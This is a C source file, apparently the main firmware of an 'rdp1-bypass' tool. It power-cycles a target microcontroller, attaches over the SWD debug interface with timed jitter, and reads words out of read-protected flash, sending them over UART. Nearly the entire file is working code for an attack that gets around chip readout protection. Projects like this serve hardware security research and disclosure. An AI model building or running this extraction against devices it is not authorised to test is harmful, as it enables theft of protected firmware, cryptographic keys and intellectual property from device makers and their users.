rdp1-bypass/main.c

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C
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2018-07-26 08:08:29 +02:00
/*
* This Source Code Form is subject to the terms of the MIT License.
* If a copy of the MIT License was not distributed with this file,
* you can obtain one at https://opensource.org/licenses/MIT
*/
#include <stdint.h>
#include <string.h>
#include "main.h"
#include "system.h"
#include "swd.h"
#include "target.h"
#include "uart.h"
static swdStatus_t extractFlashData( uint32_t const address, uint32_t * const data );
static extractionStatistics_t extractionStatistics = {0u};
static uartControl_t uartControl = {0u};
/* Reads one 32-bit word from read-protection Flash memory.
Address must be 32-bit aligned */
static swdStatus_t extractFlashData( uint32_t const address, uint32_t * const data )
{
swdStatus_t dbgStatus = swdStatusNone;
/* Add some jitter on the moment of attack (may increase attack effectiveness) */
static uint16_t delayJitter = DELAY_JITTER_MS_MIN;
uint32_t extractedData = 0u;
uint32_t idCode = 0u;
/* Limit the maximum number of attempts PER WORD */
uint32_t numReadAttempts = 0u;
/* try up to MAX_READ_TRIES times until we have the data */
do
{
LED_BSRR |= (1 << (GREEN_LED_PIN + 16)); /* off */
targetSysOn();
waitms(5u);
dbgStatus = swdInit( &idCode );
if (likely(dbgStatus == swdStatusOk))
{
dbgStatus = swdEnableDebugIF();
}
if (likely(dbgStatus == swdStatusOk))
{
dbgStatus = swdSetAP32BitMode( NULL );
}
if (likely(dbgStatus == swdStatusOk))
{
dbgStatus = swdSelectAHBAP();
}
if (likely(dbgStatus == swdStatusOk))
{
targetSysUnReset();
waitms(delayJitter);
/* The magic happens here! */
dbgStatus = swdReadAHBAddr( (address & 0xFFFFFFFCu), &extractedData );
}
targetSysReset();
++(extractionStatistics.numAttempts);
/* Check whether readout was successful. Only if swdStatusOK is returned, extractedData is valid */
if (dbgStatus == swdStatusOk)
{
*data = extractedData;
++(extractionStatistics.numSuccess);
LED_BSRR |= (1 << (GREEN_LED_PIN)); /* on */
}
else
{
++(extractionStatistics.numFailure);
++numReadAttempts;
delayJitter += DELAY_JITTER_MS_INCREMENT;
if (delayJitter >= DELAY_JITTER_MS_MAX)
{
delayJitter = DELAY_JITTER_MS_MIN;
}
}
targetSysOff();
waitms(1u);
}
while ((dbgStatus != swdStatusOk) && (numReadAttempts < (MAX_READ_ATTEMPTS)));
return dbgStatus;
}
void printExtractionStatistics( void )
{
uartSendStr("Statistics: \r\n");
uartSendStr("Attempts: 0x");
uartSendWordHexBE(extractionStatistics.numAttempts);
uartSendStr("\r\n");
uartSendStr("Success: 0x");
uartSendWordHexBE(extractionStatistics.numSuccess);
uartSendStr("\r\n");
uartSendStr("Failure: 0x");
uartSendWordHexBE(extractionStatistics.numFailure);
uartSendStr("\r\n");
}
int main()
{
uint32_t reg;
/* Enable all GPIO clocks */
AHB1_CLOCK_ER |= (GPIOA_AHB1_CLOCK_ER | GPIOB_AHB1_CLOCK_ER | GPIOC_AHB1_CLOCK_ER | GPIOD_AHB1_CLOCK_ER | GPIOE_AHB1_CLOCK_ER | GPIOF_AHB1_CLOCK_ER);
/* Leds */
#ifdef CUSTOM_HW
reg = GPIOE_MODE & ~ (0x03 << (BLUE_LED_PIN * 2));
GPIOE_MODE = reg | (1 << (BLUE_LED_PIN * 2));
reg = GPIOE_PUPD & (0x03 << (BLUE_LED_PIN * 2));
GPIOE_PUPD = reg | (0x02 << (BLUE_LED_PIN * 2));
GPIOD_MODE &= ~(0x03 << (BUTTON_PIN * 2));
#else
reg = GPIOD_MODE & ~ (0x03 << (BLUE_LED_PIN * 2));
GPIOD_MODE = reg | (1 << (BLUE_LED_PIN * 2));
reg = GPIOD_PUPD & (0x03 << (BLUE_LED_PIN * 2));
GPIOD_PUPD = reg | (0x02 << (BLUE_LED_PIN * 2));
reg = GPIOD_MODE & ~ (0x03 << (RED_LED_PIN * 2));
GPIOD_MODE = reg | (1 << (RED_LED_PIN * 2));
reg = GPIOD_PUPD & (0x03 << (RED_LED_PIN * 2));
GPIOD_PUPD = reg | (0x02 << (RED_LED_PIN * 2));
reg = GPIOD_MODE & ~ (0x03 << (GREEN_LED_PIN * 2));
GPIOD_MODE = reg | (1 << (GREEN_LED_PIN * 2));
reg = GPIOD_PUPD & (0x03 << (GREEN_LED_PIN * 2));
GPIOD_PUPD = reg | (0x02 << (GREEN_LED_PIN * 2));
/* button */
GPIOA_MODE &= ~ (0x03 << (BUTTON_PIN * 2));
#endif
/* target (swd) */
reg = GPIOA_MODE & ~ (0x03 << (PIN_SWCLK * 2));
GPIOA_MODE = reg | (1 << (PIN_SWCLK * 2));
reg = GPIOA_PUPD & (0x03 << (PIN_SWCLK * 2));
GPIOA_PUPD = reg | (0x02 << (PIN_SWCLK * 2));
reg = GPIOA_OSPD & (0x03 << (PIN_SWCLK * 2));
GPIOA_OSPD = reg | (0x03 << (PIN_SWCLK * 2));
reg = GPIOA_MODE & ~ (0x03 << (PIN_SWDIO * 2));
GPIOA_MODE = reg | (1 << (PIN_SWDIO * 2));
reg = GPIOA_PUPD & (0x03 << (PIN_SWDIO * 2));
GPIOA_PUPD = reg | (0x01 << (PIN_SWDIO * 2));
reg = GPIOA_OSPD & (0x03 << (PIN_SWDIO * 2));
GPIOA_OSPD = reg | (0x03 << (PIN_SWDIO * 2));
/* target (ctrl) */
reg = GPIOA_MODE & ~ (0x03 << (PIN_POWER * 2));
GPIOA_MODE = reg | (1 << (PIN_POWER * 2));
reg = GPIOA_PUPD & (0x03 << (PIN_POWER * 2));
GPIOA_PUPD = reg | (0x02 << (PIN_POWER * 2));
reg = GPIOA_OSPD & (0x03 << (PIN_POWER * 2));
GPIOA_OSPD = reg | (0x03 << (PIN_POWER * 2));
reg = GPIOA_MODE & ~ (0x03 << (PIN_RESET * 2));
GPIOA_MODE = reg | (1 << (PIN_RESET * 2));
reg = GPIOA_PUPD & (0x03 << (PIN_RESET * 2));
GPIOA_PUPD = reg | (0x02 << (PIN_RESET * 2));
reg = GPIOA_OSPD & (0x03 << (PIN_RESET * 2));
GPIOA_OSPD = reg | (0x03 << (PIN_RESET * 2));
clock_pll_on(0);
systick_on();
uartInit();
LED_BSRR |= (1 << BLUE_LED_PIN) | (1 << GREEN_LED_PIN);
uartControl.transmitHex = 0u;
uartControl.transmitLittleEndian = 1u;
uartControl.readoutAddress = 0x00000000u;
uartControl.readoutLen = (64u * 1024u);
uartControl.active = 0u;
uint32_t readoutInd = 0u;
uint32_t flashData = 0xFFFFFFFFu;
uint32_t btnActive = 0u;
uint32_t once = 0u;
uint32_t waitcycles = 0u;
swdStatus_t status = swdStatusOk;
while (1u)
{
uartReceiveCommands( &uartControl );
/* Start as soon as the button B1 has been pushed */
if (!(BUTTON_IDR & (1 << BUTTON_PIN)))
btnActive = 1u;
if (uartControl.active || btnActive)
{
/* reset statistics on extraction start */
if (!once)
{
once = 1u;
extractionStatistics.numAttempts = 0u;
extractionStatistics.numSuccess = 0u;
extractionStatistics.numFailure = 0u;
}
status = extractFlashData((uartControl.readoutAddress + readoutInd), &flashData);
if (status == swdStatusOk)
{
if (!(uartControl.transmitHex))
{
uartSendWordBin( flashData, &uartControl );
}
else
{
uartSendWordHex( flashData, &uartControl );
uartSendStr(" ");
}
readoutInd += 4u;
}
else
{
if (uartControl.transmitHex)
{
uartSendStr("\r\n!ExtractionFailure");
uartSendWordHexBE( status );
}
}
if ((readoutInd >= uartControl.readoutLen) || (status != swdStatusOk))
{
btnActive = 0u;
uartControl.active = 0u;
readoutInd = 0u;
once = 0u;
/* Print EOF in HEX mode */
if (uartControl.transmitHex != 0u)
{
uartSendStr("\r\n");
}
}
} else { /* Idle */
if (waitcycles++ == 2000000) {
LED_BSRR |= (1 << BLUE_LED_PIN);
waitcycles = 0;
}
if (waitcycles == 1000000) {
LED_BSRR |= (1 << (BLUE_LED_PIN + 16));
}
}
}
return 0u;
}